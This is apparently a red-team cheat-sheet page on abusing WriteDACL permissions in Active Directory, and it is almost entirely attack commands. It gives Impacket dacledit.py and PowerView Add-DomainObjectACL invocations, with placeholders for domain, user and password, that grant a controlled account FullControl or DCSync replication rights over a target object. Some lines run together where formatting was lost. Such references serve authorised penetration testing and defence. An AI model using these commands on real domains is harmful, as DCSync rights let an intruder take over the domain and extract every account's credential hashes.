PRIMARY CATEGORY → DACL ABUSE
Theory
WriteDACL
Abuse - UNIX-like
Impacket’s DACLedit.py
Grant FullControl Right
GenericAll
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights FullControl '<DOMAIN>/<USER>:<PASSWD>'Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
dacledit.py -dc-ip '<DC>' -principal '<CONTROLLED_OBJECT>' -target '<TARGET_OBJECT>' -action write -rights DCSync '<DOMAIN>/<USER>:<PASSWD>'BloodyAD
Abuse - Windows
Powerview
Grant FullControl Right
GenericAll
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)Add-DomainObjectACL -Credential $cred -Rights 'All' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'Grant DCSync Rights
DS-Replication-Get-Changes DS-Replication-Get-Changes-All
$passwd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $passwd)Add-DomainObjectACL -Credential $cred -Rights 'DCSync' -PrincipalIdentity '<CONTROLLED_OBJECT>' -TargetIdentity '<TARGET_OBJECT>'